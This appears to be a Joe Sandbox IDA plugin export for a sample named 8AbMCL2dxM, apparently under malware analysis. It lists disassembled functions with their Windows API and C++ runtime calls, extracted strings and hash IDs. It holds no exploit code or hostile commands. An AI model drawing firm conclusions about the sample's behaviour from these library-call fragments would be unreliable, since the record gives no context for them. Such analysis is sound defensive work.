                                      • Opcode ID: e4fea81e3986cddc4d90850df98227f91e4cfd050c9c23d1be7dfc8bbd691fb5
                                      • Instruction ID: 0887967f01585393a9e1e83be450c00ab3ba032b8b901af66f140568a0ce232e
                                      • Opcode Fuzzy Hash: e4fea81e3986cddc4d90850df98227f91e4cfd050c9c23d1be7dfc8bbd691fb5
                                      • Instruction Fuzzy Hash: CF11E571544205EBCB24EFA8DC4AFEE776CAF04711F208119F505A60E1EB749E04C761
                                      APIs
                                      • GetCurrentThreadId.KERNEL32 ref: 009552CC
                                      • GetCurrentProcess.KERNEL32(?,?,?,?,?,0094917E,?,?,?,?,00000000,?,00000000), ref: 009552DE
                                      • GetCurrentThread.KERNEL32 ref: 009552E6
                                      • GetCurrentProcess.KERNEL32(?,?,?,?,?,0094917E,?,?,?,?,00000000,?,00000000), ref: 009552EE
                                      • DuplicateHandle.KERNEL32(00000000,00000000,00000000,00949222,00000000,00000000,00000002,?,?,?,?,?,0094917E,?,?,?), ref: 00955307
                                      • Concurrency::details::RegisterAsyncWaitAndLoadLibrary.LIBCONCRT ref: 00955328
                                        • Part of subcall function 009435B4: ___crtCreateThreadpoolTimer.LIBCPMT ref: 009435C0
                                        • Part of subcall function 009435B4: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 009435CE
                                        • Part of subcall function 009435B4: ___crtSetThreadpoolWait.LIBCPMT ref: 009435E0
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,0094917E,?,?,?,?,00000000,?,00000000), ref: 0095533A
                                      • GetLastError.KERNEL32(?,?,?,?,0094917E,?,?,?,?,00000000,?,00000000), ref: 00955365
                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0095537B
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00955389
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Current$Concurrency::details::ErrorLastLibraryLoadProcessThreadThreadpoolWait___crt$AsyncConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateDuplicateException@8HandleReferenceRegisterThrowTimer
                                      • String ID:
                                      • API String ID: 1073306966-0
                                      • Opcode ID: 31fb9a1a18525174e61fc178e648db1ebb4fa3af0218e48de2c7b7f49bbedaad
                                      • Instruction ID: 4d0434d7984553a457caa4e0f71d3fe82b49f64848746df91c691d51dd5f4b7a
                                      • Opcode Fuzzy Hash: 31fb9a1a18525174e61fc178e648db1ebb4fa3af0218e48de2c7b7f49bbedaad
                                      • Instruction Fuzzy Hash: 3D11D5B1A08300EBC710EF799C5AF9A3B6CAF45381F054076FE49D6162EA70CA089B71
                                      APIs
                                      • _free.LIBCMT ref: 00974A99
                                        • Part of subcall function 00975565: HeapFree.KERNEL32(00000000,00000000,?,0097DDF8,?,00000000,?,00000000,?,0097E09C,?,00000007,?,?,0097E490,?), ref: 0097557B
                                        • Part of subcall function 00975565: GetLastError.KERNEL32(?,?,0097DDF8,?,00000000,?,00000000,?,0097E09C,?,00000007,?,?,0097E490,?,?), ref: 0097558D
                                      • _free.LIBCMT ref: 00974AA5
                                      • _free.LIBCMT ref: 00974AB0
                                      • _free.LIBCMT ref: 00974ABB
                                      • _free.LIBCMT ref: 00974AC6
                                      • _free.LIBCMT ref: 00974AD1
                                      • _free.LIBCMT ref: 00974ADC
                                      • _free.LIBCMT ref: 00974AE7
                                      • _free.LIBCMT ref: 00974AF2
                                      • _free.LIBCMT ref: 00974B00
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 5b6716085d02569bc62a412d2189c5a37f0862d843bb4e1a0ffdcb4d6c0411f5
                                      • Instruction ID: 0a5c8122970f48805b6f65b0ee91ee5c1053d3d51f62206c5a17c4e13dd146be
                                      • Opcode Fuzzy Hash: 5b6716085d02569bc62a412d2189c5a37f0862d843bb4e1a0ffdcb4d6c0411f5
                                      • Instruction Fuzzy Hash: 7B118676540548FFCB41EF95C842ED93BA6EF44B50F9680A5BA0C8F222DA71DE509B80
                                      APIs
                                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 008C895A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Ios_base_dtorstd::ios_base::_
                                      • String ID: %$&4r*3d$($.1UI$77H75$_Mail-$_[ID-
                                      • API String ID: 323602529-187489793
                                      • Opcode ID: f0ad2644dad474c59f8c94062db39c4fbb15ffd448d5c5792af61c0f10e7732a
                                      • Instruction ID: 400d435f72618590ca98dc97720ba260e8b00f148f86392fdbd883feb0784c91
                                      • Opcode Fuzzy Hash: f0ad2644dad474c59f8c94062db39c4fbb15ffd448d5c5792af61c0f10e7732a
                                      • Instruction Fuzzy Hash: 22129C30A14258CBDB25CF28CD58BEDBBB1FB85308F50829DD449AB292DB75DA84CF51
                                      APIs
                                      • __EH_prolog3.LIBCMT ref: 0093B095
                                        • Part of subcall function 008E95D0: std::_Lockit::_Lockit.LIBCPMT ref: 008E9619
                                        • Part of subcall function 008E95D0: std::_Lockit::_Lockit.LIBCPMT ref: 008E963B
                                        • Part of subcall function 008E95D0: std::_Lockit::~_Lockit.LIBCPMT ref: 008E965B
                                        • Part of subcall function 008E95D0: std::_Lockit::~_Lockit.LIBCPMT ref: 008E9728
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                      • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                      • API String ID: 1383202999-2891247106
                                      • Opcode ID: 5f5eb3a423225f679f86bd47ef5c366fb7448ca7862251f47048fbf6219d98cf
                                      • Instruction ID: b436b376ac32891685d665c361d08dfb69ed26dda9c52e796deab39bb4af0b3c
                                      • Opcode Fuzzy Hash: 5f5eb3a423225f679f86bd47ef5c366fb7448ca7862251f47048fbf6219d98cf
                                      • Instruction Fuzzy Hash: 04A1467290020AEFCF05DF94C892EFE7BBAEB49304F00491AFA55A6291E7359910DF61
                                      APIs
                                      • QueryPerformanceCounter.KERNEL32(?), ref: 009255AA
                                      • GetLastError.KERNEL32(0000000A), ref: 009255D5
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00925616
                                      Strings
                                      • Timer: QueryPerformanceCounter failed with error , xrefs: 009255F0
                                      • Timer: QueryPerformanceFrequency failed with error , xrefs: 009256DB
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: CounterErrorException@8LastPerformanceQueryThrow
                                      • String ID: Timer: QueryPerformanceCounter failed with error $Timer: QueryPerformanceFrequency failed with error
                                      • API String ID: 651023626-2136607233
                                      • Opcode ID: 42f3e45ea6d4629e70c5a2e49475bff41f17200dc436cbd170721b0d87a79d01
                                      • Instruction ID: 933d8fe2aab088d68ab2d4c038b4b6be3a5814b776461e5c1e832ce12e621bcb
                                      • Opcode Fuzzy Hash: 42f3e45ea6d4629e70c5a2e49475bff41f17200dc436cbd170721b0d87a79d01
                                      • Instruction Fuzzy Hash: 17414BB1D44348EBDB10EFA8DC45F9EB7B8FB44714F50462AF819A7282DB74A604CB51
                                      APIs
                                      • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00956555
                                        • Part of subcall function 00956824: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00956288), ref: 00956834
                                      • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0095656A
                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00956579
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00956587
                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0095663D
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0095664B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Concurrency::details::Exception@8Throwstd::invalid_argument::invalid_argument$ExecutionFreeIdleObjectProcessorProxy::ResetRoot::SingleSuspendThreadVirtualWait
                                      • String ID: pContext$switchState
                                      • API String ID: 2757187270-2660820399
                                      • Opcode ID: 43e0df430d5f6f1ded3d68cc628c17ecb9df4bf086514bd3f4d63505066d1408
                                      • Instruction ID: a1e7cc412e87fbf79ddd548ac1bafb3d70b74b3f70a47bf58565ad57b4cb8a34
                                      • Opcode Fuzzy Hash: 43e0df430d5f6f1ded3d68cc628c17ecb9df4bf086514bd3f4d63505066d1408
                                      • Instruction Fuzzy Hash: EE31D675A00214ABCF04EF69C885E6D77B9BF84315F604569ED11A7245EB70EE0AC790
                                      APIs
                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00948382
                                      • Concurrency::details::SchedulingNode::AddVirtualProcessor.LIBCONCRT ref: 009483D1
                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 009483F4
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00948402
                                      • __EH_prolog3.LIBCMT ref: 0094840F
                                      • Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 00948436
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: CacheConcurrency::details::GroupLocalSchedulestd::invalid_argument::invalid_argument$Exception@8H_prolog3Node::ProcessorSchedulingSegmentSegment::ThrowVirtual
                                      • String ID: count$ppVirtualProcessorRoots
                                      • API String ID: 3227653198-3650809737
                                      • Opcode ID: d6fccda53765857c2b3814c06bf6ed502356d0734681181234d2810072f7d940
                                      • Instruction ID: 444c0a19dda923292483f40cfc93d7b0a7650acbdd2027dfe50cbb7b02e02d99
                                      • Opcode Fuzzy Hash: d6fccda53765857c2b3814c06bf6ed502356d0734681181234d2810072f7d940
                                      • Instruction Fuzzy Hash: 5C21C435A00215EFCB08EFA8C896FAE77B5BF88704F004069F506A7291DF70AE01CB50
                                      APIs
                                      • DName::DName.LIBVCRUNTIME ref: 00960394
                                      • UnDecorator::getSignedDimension.LIBCMT ref: 009603A7
                                      • DName::getString.LIBVCRUNTIME ref: 009603CC
                                      • DName::DName.LIBVCRUNTIME ref: 009603FD
                                        • Part of subcall function 0095BA28: DName::doPchar.LIBVCRUNTIME ref: 0095BA4F
                                      • DName::operator+.LIBCMT ref: 0096040C
                                        • Part of subcall function 0095BD6A: DName::operator+=.LIBVCRUNTIME ref: 0095BD80
                                      • DName::operator+.LIBCMT ref: 0096041A
                                        • Part of subcall function 0095BDAE: DName::operator+=.LIBCMT ref: 0095BDC4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: NameName::Name::operator+Name::operator+=$Decorator::getDimensionName::doName::getPcharSignedString
                                      • String ID: `template-parameter$void
                                      • API String ID: 2542415585-4057429177
                                      • Opcode ID: 6aeaf2b853e1d7eeeaa61190529d85e30e8db037873132a04744184db65baec6
                                      • Instruction ID: d6143f234ff531f8c1ca4395932bd36fc129cb75c80fc5682135b347bfb4859e
                                      • Opcode Fuzzy Hash: 6aeaf2b853e1d7eeeaa61190529d85e30e8db037873132a04744184db65baec6
                                      • Instruction Fuzzy Hash: 4121C572A152089BCB14EBA5DC92FFF73B8EB84312F60401AE502A2191EF746D49D760
                                      APIs
                                      • UnDecorator::getArgumentList.LIBVCRUNTIME ref: 0095CE65
                                        • Part of subcall function 0095CD4F: Replicator::operator[].LIBVCRUNTIME ref: 0095CDBB
                                        • Part of subcall function 0095CD4F: DName::operator+=.LIBVCRUNTIME ref: 0095CDC3
                                      • DName::operator+.LIBCMT ref: 0095CEBC
                                      • DName::DName.LIBVCRUNTIME ref: 0095CF05
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
                                      • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                      • API String ID: 834187326-2211150622
                                      • Opcode ID: f97274909eeff3b542b2d7a834b0a3c93361e2f78a82e182f05cca10d1bdb74a
                                      • Instruction ID: 33003db35b911fdc47dd3311e33237a6e9ff8f0ed732c97c341d90c30bb6c001
                                      • Opcode Fuzzy Hash: f97274909eeff3b542b2d7a834b0a3c93361e2f78a82e182f05cca10d1bdb74a
                                      • Instruction Fuzzy Hash: 232181B0226304DFCB14DF1ED852B663FE9EB15346F144459E885DB262CB30DD89DB50
                                      APIs
                                      • UnDecorator::UScore.LIBVCRUNTIME ref: 0095D0C8
                                      • DName::DName.LIBVCRUNTIME ref: 0095D0D2
                                        • Part of subcall function 0095BA28: DName::doPchar.LIBVCRUNTIME ref: 0095BA4F
                                      • UnDecorator::getScopedName.LIBVCRUNTIME ref: 0095D111
                                      • DName::operator+=.LIBVCRUNTIME ref: 0095D11B
                                      • DName::operator+=.LIBCMT ref: 0095D12A
                                      • DName::operator+=.LIBCMT ref: 0095D136
                                      • DName::operator+=.LIBCMT ref: 0095D143
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
                                      • String ID: void
                                      • API String ID: 1480779885-3531332078
                                      • Opcode ID: e12909b97f1d9474ff99f552d17774559c330c16cbafb24eef76e064f01c45d5
                                      • Instruction ID: ddb9f89c9c2294a40ac65f79fd96e8b9f30a22c5e2a94a372f0d06da54648c58
                                      • Opcode Fuzzy Hash: e12909b97f1d9474ff99f552d17774559c330c16cbafb24eef76e064f01c45d5
                                      • Instruction Fuzzy Hash: 2E11E170509604AFCB08EF6ACA56BBDBB74EF41306F044489F8025B2D2DB709D4DCB90
                                      APIs
                                      • GetCPInfo.KERNEL32(009640B8,?,00000000,7FFFFFFF,?,?,00984406,009640B8,009640B8,?,?,?,?,?,?,?), ref: 009841D9
                                      • MultiByteToWideChar.KERNEL32(009640B8,00000009,009640B8,?,00000000,00000000,?,00984406,009640B8,009640B8,?,?,?,?,?,?), ref: 0098425C
                                      • __alloca_probe_16.LIBCMT ref: 00984294
                                      • MultiByteToWideChar.KERNEL32(009640B8,00000001,009640B8,?,00000000,00984406,?,00984406,009640B8,009640B8,?,?,?,?,?,?), ref: 009842EF
                                      • __alloca_probe_16.LIBCMT ref: 0098433E
                                      • MultiByteToWideChar.KERNEL32(009640B8,00000009,009640B8,009640B8,00000000,00000000,?,00984406,009640B8,009640B8,?,?,?,?,?,?), ref: 00984306
                                        • Part of subcall function 00976393: RtlAllocateHeap.NTDLL(00000000,?,?,?,0095833C,?,?,?,?,?,008B1F07,?,?,?), ref: 009763C5
                                      • MultiByteToWideChar.KERNEL32(009640B8,00000001,009640B8,009640B8,00000000,009640B8,?,00984406,009640B8,009640B8,?,?,?,?,?,?), ref: 00984382
                                      • __freea.LIBCMT ref: 009843AD
                                      • __freea.LIBCMT ref: 009843B9
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                      • String ID:
                                      • API String ID: 201697637-0
                                      • Opcode ID: d908a5d835594f3b0e30ce9722d1eb7c523c5a33281310be67ff8316966fadcb
                                      • Instruction ID: f4dd63015506550e4963a2d12f18b77c26a87ea3da0349d8a26d7c91837a3187
                                      • Opcode Fuzzy Hash: d908a5d835594f3b0e30ce9722d1eb7c523c5a33281310be67ff8316966fadcb
                                      • Instruction Fuzzy Hash: A891D571E0421B9BDF20AE64CD85EEEBBB9AF55714F14461AE805E7380D739DC80CBA0
                                      APIs
                                      • SetEvent.KERNEL32(00000000,BA3649C5), ref: 0093F369
                                      • SetEvent.KERNEL32(00000000,BA3649C5), ref: 0093F3C6
                                      • ReleaseSemaphore.KERNEL32(?,?,00000000,BA3649C5), ref: 0093F3DA
                                      • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 0093F3FF
                                      • CloseHandle.KERNEL32(?), ref: 0093F433
                                      • SetEvent.KERNEL32(00000000), ref: 0093F470
                                        • Part of subcall function 008B50A0: CreateEventA.KERNEL32(?,?,?,?,BA3649C5,BA3649C5,?,009404E2,?,BA3649C5,BA3649C5,?,?,?,00000000,00000000), ref: 008B50D4
                                        • Part of subcall function 008B50A0: CloseHandle.KERNEL32(00000000,?,009404E2,?,BA3649C5,BA3649C5,?,?,?,00000000,00000000,BA3649C5,BA3649C5), ref: 008B50EF
                                      • SetEvent.KERNEL32(00000000,?,BA3649C5), ref: 0093F4F8
                                      • CloseHandle.KERNEL32(?,BA3649C5), ref: 0093F526
                                      • CloseHandle.KERNEL32(?,BA3649C5), ref: 0093F603
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Event$CloseHandle$ReleaseSemaphore$Create
                                      • String ID:
                                      • API String ID: 573037752-0
                                      • Opcode ID: c5020070469a6f7d694a1e7942642a9c46f20e307fdd531098b5049243e31aa4
                                      • Instruction ID: 8d3cdcdc56253af6ac4ade10827b981d719b428689eb600e2741801f4abd58a3
                                      • Opcode Fuzzy Hash: c5020070469a6f7d694a1e7942642a9c46f20e307fdd531098b5049243e31aa4
                                      • Instruction Fuzzy Hash: 83A1AD71D002099BDF15DF28C89876EB7A9FF44328F244269E818AB2A1D739ED45CF91
                                      APIs
                                      • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 0094ADBE
                                        • Part of subcall function 00949188: __EH_prolog3_catch.LIBCMT ref: 0094918F
                                        • Part of subcall function 00949188: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 009491C8
                                      • Concurrency::details::SchedulerBase::NotifyThrottledContext.LIBCONCRT ref: 0094ADCC
                                        • Part of subcall function 00949DE5: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 00949E0A
                                        • Part of subcall function 00949DE5: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 00949E2D
                                      • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 0094ADE5
                                      • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 0094ADF1
                                        • Part of subcall function 00949188: InterlockedPopEntrySList.KERNEL32(?), ref: 00949211
                                        • Part of subcall function 00949188: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 00949240
                                        • Part of subcall function 00949188: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 0094924E
                                      • Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 0094AE3D
                                      • Concurrency::location::_Assign.LIBCMT ref: 0094AE5E
                                      • Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 0094AE66
                                      • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 0094AE78
                                      • Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 0094AEA8
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
